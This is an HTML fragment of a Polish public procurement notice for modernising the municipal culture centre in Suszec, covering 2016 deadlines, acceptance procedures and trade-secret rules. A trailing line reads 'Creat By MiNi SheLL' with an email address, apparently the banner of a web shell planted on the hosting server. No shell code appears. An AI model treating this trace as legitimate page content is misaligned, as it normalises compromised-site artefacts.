<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacje dodatkowe: Projekt Modernizacja Gminnego Ośrodka Kultury w Suszcu jest współfinansowany ze środków Ministerstwa Kultury i Dziedzictwa Narodowego w ramach programu Infrastruktura domów kultury. INNE INFORMACJE: ZGODNIE Z PKT. 4 SIWZ:
4.	Termin wykonania zamówienia:
4.1	Wymagany termin realizacji zamówienia: od podpisania umowy do 10.11.2016 r.  
4.2	Dostawa i montaż przedmiotu zamówienia nastąpi po wykonaniu prac budowlanych wykończeniowych (instalacyjnych, demontażowych i malarskich) na sali widowiskowej Gminnego Ośrodka Kultury, realizowanych na podstawie odrębnej umowy, tj. po 20.10.2016 r. i w terminach ściśle uzgodnionych z zamawiającym. Zamawiający dopuszcza możliwość wcześniejszej realizacji zamówienia tylko w zakresie i w terminie takim, który nie będzie kolidował z w/w pracami budowlanymi w obiekcie oraz z terminami zarezerwowanymi na  imprezy i wesela. 
4.3	Zgodnie z postanowieniami określonymi w § 6 istotnych postanowień umowy - zał. 2 do SIWZ, WYKONAWCA jest zobowiązany do pisemnego zgłoszenia ZAMAWIAJĄCEMU gotowości do odbioru końcowego przedmiotu umowy w terminie nie później niż 3 dni przed 10.11.2016 r.,                   z zastrzeżeniem §10 ust 1 lit. c) istotnych postanowień umowy.
4.4	Termin realizacji zamówienia wskazany w ust. 4.1 uwzględnia 3-dniowy okres na przeprowadzenie procedury związanej z ostatecznym odbiorem robót budowlanych.
ZGODNIE Z PKT. 14 LIT. I) SIWZ: i) wykonawca składając ofertę ma prawo zastrzec, które informacje w niej zawarte stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji i nie mogą być udostępniane. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy. Uwaga! Zgodnie z art. 8 ust. 3 Pzp: Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli wykonawca, nie później niż w terminie składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu, zastrzegł, że nie mogą być one udostępniane oraz wykazał, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Dokumenty zastrzeżone wykonawca winien ponumerowane i zszyte złożyć w oddzielnej wewnętrznej kopercie z oznakowaniem - tajemnica przedsiębiorstwa-. Stosowne zastrzeżenie wykonawca winien złożyć w formularzu ofertowym w pkt 9: - Uwagi do oferty.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com